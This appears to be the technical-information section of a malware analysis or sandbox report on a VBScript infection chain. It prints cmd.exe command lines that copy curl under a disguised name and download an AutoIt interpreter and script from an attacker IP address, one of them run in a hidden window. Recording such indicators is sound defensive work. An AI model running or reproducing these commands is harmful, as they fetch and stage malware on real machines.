Technical Information
- '<SYSTEM32>\wscript.exe' "C:\sjma\bipwqh.vbs"
- C:\sjma\bipwqh.vbs
- '5.##8.87.58':2351
- http://5.###.87.58:2351/kzbrotjb via 5.##8.87.58
- '<SYSTEM32>\cmd.exe' /c mkdir c:\kzbr & cd /d c:\kzbr & copy <SYSTEM32>\curl.exe kzbr.exe & kzbr -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & kzbr -o dhwzot.au3 http://5.188.87.58:2351/msikzbrotj...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c mkdir c:\kzbr & cd /d c:\kzbr & copy <SYSTEM32>\curl.exe kzbr.exe & kzbr -H "User-Agent: curl" -o Autoit3.exe http://5.188.87.58:2351 & kzbr -o dhwzot.au3 http://5.188.87.58:2351/msikzbrotj...